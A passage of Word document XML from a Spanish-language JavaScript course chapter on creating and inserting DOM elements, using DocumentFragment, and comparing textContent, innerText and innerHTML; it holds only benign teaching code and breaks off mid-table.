        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.6 — Crear y modificar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="7F1224E5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc239319988"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.6.1 — Crear e insertar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="761E5D99" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const li = document.createElement("li");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F9B2E4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>li.className = "item-carrito";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750957D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>li.textContent = producto.nombre;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4983D33F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>lista.appendChild(li);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614BF4DF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Un elemento creado no está en el documento hasta que lo insertás.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Las tres primeras líneas arman un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;li&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que existe en memoria y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no se ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>; recién la cuarta lo mete en la página — distinción que vuelve en 4.9. Las formas de insertar son cuatro:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4511"/>
        <w:gridCol w:w="4505"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="10556CC1"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39FDF8D0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Método</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5F3F0952" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Dónde inserta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="5FAE49E5"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839D30C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>padre.appendChild(nodo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D625046" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Al final de los hijos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="42475877"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C55C66F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>padre.prepend(nodo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41AA6DE9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Al principio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="62D5F16F"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46199862" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>ref.before(nodo)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>ref.after(nodo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EF7C88F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Antes o después de un hermano</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="4BBD9F02"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449C2736" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>el.insertAdjacentElement(pos, nodo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4513" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35990E12" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>En cuatro posiciones relativas al elemento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4489DABB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc239319989"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Insertar muchos: el fragmento de documento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="77990AF3" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un contenedor que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no forma parte del documento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: lo llenás afuera del árbol y lo insertás una vez, evitando el costo que explica 4.10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546165F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const fragmento = document.createDocumentFragment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD50B5C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>for (const producto of productos) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0421A1E4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  const li = document.createElement("li");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194C56A9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  li.textContent = producto.nombre;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A55907" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  fragmento.appendChild(li);          // todavía no toca el documento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02552DE6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE878E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>lista.appendChild(fragmento);         // una sola modificación real</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3305D802" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="EFEFEF" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="46331281" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="595959"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>La bandeja del mozo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3059A705" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Un mozo no lleva un plato por vez desde la cocina.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Carga la bandeja entera y hace </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>un solo viaje</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> al salón. El </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>DocumentFragment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es la bandeja: armás los cien </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;li&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> afuera del documento —donde el navegador no recalcula nada— y hacés un solo viaje al árbol real.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A694195" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Y fijate en el detalle elegante: al insertarlo, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>el fragmento no queda adentro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">. Se vacía y desaparece; quedan los cien </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;li&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> como hijos directos de la lista.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="023C8758" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc239319990"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6.2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="6720DA70" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Las tres leen y escriben el contenido de un elemento y parecen intercambiables, pero sus diferencias son decisivas: una funda una regla obligatoria del TPI.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
        <w:gridCol w:w="2254"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="69933CA9" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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7268DF9E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Propiedad</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3C579494" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Al escribir</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06EBC610" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Al leer</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1E1A148E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Costo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="1D14B9D0"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508B1E9F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0422A3F0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Inserta </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>texto literal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FF7F06D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Todo el texto, incluido el oculto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25CF4EF4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="69F93833"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3F292BDE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerText</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2984AC2E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Inserta texto literal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="61CE33F4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Sólo el texto </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EAC1047" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Alto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>: fuerza recálculo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="120ECC7C"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18EDF683" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C16CE56" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Interpreta el texto como marcado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11F6B5C7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
